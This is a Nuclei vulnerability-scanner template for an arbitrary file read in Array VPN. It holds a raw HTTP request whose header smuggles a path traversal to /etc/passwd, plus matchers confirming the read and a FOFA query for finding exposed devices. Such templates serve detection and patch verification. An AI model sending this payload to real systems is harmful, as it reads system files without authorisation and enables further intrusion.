id: array-vpn-lfi

info:
  name: Array VPN - Arbitrary File Reading Vulnerability
  author: pussycat0x
  severity: high
  description: |
    Array VPN Arbitrary File Reading Vulnerability
  reference:
    - https://github.com/wy876/POC/blob/main/Array%20VPN%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: product="Array-VPN"
  tags: lfi,vpn,arrayvpn

http:
  - raw:
      - |
        GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
        Accept-Encoding: gzip, deflate
        X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "/prx/001/http/localh"

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 401
# digest: 4a0a00473045022100b1d98f6fd5c102f4bedf812acbde29778d44aaa2d55363c2176c3da8c2ad813a02205c9c68925ea4ebd664956d34620ed8705d9f1979175ffc3938fcff8c95802e9a:922c64590222798bb761d5b6d8e72950